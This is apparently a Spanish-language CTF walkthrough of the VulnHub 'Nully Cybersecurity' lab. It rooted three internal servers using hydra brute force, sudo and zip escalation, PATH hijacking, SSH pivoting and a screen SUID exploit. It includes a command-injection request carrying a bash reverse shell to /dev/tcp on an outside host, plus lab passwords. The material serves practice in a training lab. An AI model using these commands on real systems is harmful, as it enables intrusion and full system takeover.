nully-cybersecurity port forwarding

 https://www.vulnhub.com/entry/nully-cybersecurity-1,549/

Nully Cybersecurity - this is an easy-intermediate realistic machine.

While working with the machine, you will need to brute force, pivoting (using metasploit, via portfwd), exploitation web app, and using searchsploit.

About: Wait 5-8 minutes before starting for the machine to start its services. Also, check the welcome page on port 80.

Hints: 'cat rockyou.txt | grep bobby > wordlist' for generating wordlist.

Story: You are a Professional White Hat. Small company Nully Cybersecurity hired you to conduct a security test of their internal corporate systems.

0- con hydra bruteforceamos ssh bob con el hint del wordlist

entramos

la ip interna es 172.17.0.3. Sabemos que hay que rootear 3 servidores (mail,web,data) y estamos en mail

hacemos nmap 172.17.0.0/24 para ver la red interna

PORT     STATE SERVICE

80/tcp   open  http

110/tcp  open  pop3

2222/tcp open  EtherNetIP-1

8000/tcp open  http-alt

9000/tcp open  cslistener

MAC Address: 02:42:74:EA:1F:9C (Unknown)

Nmap scan report for 172.17.0.2

Host is up (0.000024s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE

22/tcp open  ssh

80/tcp open  http

MAC Address: 02:42:AC:11:00:02 (Unknown)

Nmap scan report for 172.17.0.4

Host is up (0.000014s latency).

Not shown: 998 closed ports

PORT     STATE SERVICE

8000/tcp open  http-alt

9000/tcp open  cslistener

MAC Address: 02:42:AC:11:00:04 (Unknown)

Nmap scan report for 172.17.0.5

Host is up (0.000022s latency).

Not shown: 998 closed ports

PORT   STATE SERVICE

21/tcp open  ftp

22/tcp open  ssh

MAC Address: 02:42:AC:11:00:05 (Unknown)

Nmap scan report for MailServer (172.17.0.3)

Host is up (0.0000060s latency).

Not shown: 997 closed ports

PORT    STATE SERVICE

22/tcp  open  ssh

110/tcp open  pop3

143/tcp open  imap

1. rootear el servidor mail, bob

bob@MailServer:/opt/scripts$ sudo -l

Matching Defaults entries for bob on MailServer:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User bob may run the following commands on MailServer:

    (my2user) NOPASSWD: /bin/bash /opt/scripts/check.sh

bob@MailServer:/opt/scripts$ echo '/bin/bash' > check.sh

bob@MailServer:/opt/scripts$ sudo -u my2user /bin/bash /opt/scripts/check.sh

sudo: setrlimit(RLIMIT_CORE): Operation not permitted

my2user@MailServer:/opt/scripts$ id

uid=1001(my2user) gid=1001(my2user) groups=1001(my2user)

my2user@MailServer:/opt/scripts$ sudo -l

Matching Defaults entries for my2user on MailServer:

    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User my2user may run the following commands on MailServer:

    (root) NOPASSWD: /usr/bin/zip

my2user@MailServer:/opt/scripts$ TF=$(mktemp -u)

my2user@MailServer:/opt/scripts$ sudo zip $TF /etc/hosts -T -TT 'sh #'

  adding: etc/hosts (deflated 33%)

# id

uid=0(root) gid=0(root) groups=0(root)

2- servidor web: intuimos que es el 172.17.0.2

bob@MailServer:~$ curl 172.17.0.2

<html>

<head>

<title>Nully Cybersecurity</title>

</head>

<body>

<h1 align="center">Under Construction</h1>

<p>So, there should be a website here, but it's still under construction. -Oliver</p>

</body>

</html>

bob@MailServer:~$ 

para fuzzearlo en nuestra máquina hacemos

sudo ssh -L 127.0.0.1:8888:172.17.0.2:80 bob@192.168.2.107 -p 2222 -f -N

fuf 127.0.0.1:8888 

y descubrimos ping.php, hacemos la llamada siguiente

curl 127.0.0.1:8888/ping/ping.php?host=192.168.2.75%3Bbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.2.84%2F9998%200%3E%261%27 

para shell reverse

en backups descubrimos la contraseña de oliver 4hppfvhb9pW4E4OrbMLwPETRgVo2KyyDTqGF

no podemos hacer sudo y por eso entonces en nuestra máquina

sudo ssh -L 127.0.0.1:2223:172.17.0.2:22 bob@192.168.2.107 -p 2222 -f -N

así accedemos a oliver por ssh

ssh oliver@127.0.0.1 -p 2223

necesitamos escalar a oscar que es dueño de python3

python3 -c 'import os; os.execl("/bin/sh", "sh", "-p")' 

accedemos a oscar y encontramos su contraseña H53QfJcXNcur9xFGND3bkPlVlMYUrPyBp76o

tenemos un script que nos puede llevar a root

lo transferimos con scp para analizar con ghidra

scp current-date kali@192.168.2.84:~/current-date

solo se trata de esto

oscar@WebServer:~/scripts$ echo '/bin/bash' > date

oscar@WebServer:~/scripts$ chmod +x date

oscar@WebServer:~/scripts$ export PATH=:$PATH

oscar@WebServer:~/scripts$ ./current-date

root@WebServer:~/scripts# id

uid=0(root) gid=0(root) groups=0(root),1000(oscar)

3- dataserver

en 5 tenemos el dataserver, por ftp anónimo cazamos un backup.zip oculto, lo crackeamos con john y tenemos credenciales

donald:HBRLoCZ0b9NEgh8vsECS

entramos y tenemos suid screen, usamos exploit

https://www.exploit-db.com/exploits/41154

donald@DatabaseServer:~$ id

uid=1000(donald) gid=1000(donald) groups=1000(donald)

donald@DatabaseServer:~$ cd /tmp

donald@DatabaseServer:/tmp$ ls

conftest6257  libhax.c  libhax.so  rootshell  rootshell.c  screens

donald@DatabaseServer:/tmp$ ./rootshell

# id

uid=0(root) gid=0(root) groups=0(root),1000(donald)

#